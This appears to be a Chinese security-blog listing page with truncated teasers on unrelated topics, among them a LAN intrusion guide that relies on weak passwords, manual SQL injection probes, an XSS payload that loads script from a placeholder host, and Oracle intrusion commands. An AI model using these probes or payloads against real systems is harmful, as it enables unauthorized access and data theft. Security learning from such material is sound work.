为深入贯彻落实十八大精神,提升征信服务水平,中国人民银行征信中心(以下简称征信中心)积极拓展服务渠道,推动通过互联网(htt...
Seay信息安全博客
超牛逼小偷逃亡期间研究黑客技术与野外生存技
显示不全请点击全屏阅读 张晨从网上购买的帐篷、睡袋、雨衣等物品 冒险盗来的2万余元现金被人骗去了大半,张晨决心上网钻研黑客技术攻入对方网站,追回被骗去的钱财。黑客没那么容易当,张晨于是在网上学习野...
局域网入侵完全版
首先申明: 1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子...
注入命令 手工注入命令大全
1.判断是否有注入;and 1=1 ;and 1=22.初步判断是否是mssql ;and user>03.注入参数是字符'and and ''='4.搜索时没过滤参数的'and and '%2...
web安全训练和教学光盘 – GameOver
GameOver是一个web安全训练和教学光盘。光盘中主要收录了一些有漏洞的web程序。GameOver主要分两块内容:一部分是比较初级的,多个特定的web程序包含了以下常见的web漏洞类型 •XSS...
Nmap6.25圣诞版发布!增加85个新脚本,更优性能,Win8增强特性等
自Nmap6.01发布已经5个多月过去了,今天告诉大家一个好消息:Nmap6.25发布!希望各位能够欢度圣诞。Nmap 6.25包含了数百项改进,包括85个新NSE脚本,近1000个新OS和服务指纹识...
教你如何在XSS中再插JS
<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';do...
oracle
AWR 深入分析( Automatic Workload Repository )
Automatic Workload Repository 是 10g 引入的一个重要组件 存贮着近期一段时间内数据库活动状态的详细信息、信息保留默认...
风土人情
12.21帝都东北三环抚摸指南(酸爽版)
朝三暮四,一天七次,酸爽吧?说的是你在12月21日的虎嗅F&M节(又称抚摸节)现场,早上玩三次互动,下午玩四次互动,是完全玩不过来的!所以,我们打算整一篇攻略,给面基的小伙伴们一个加持。当然,...
入侵Oracle数据库常用操作命令
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle 请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的...
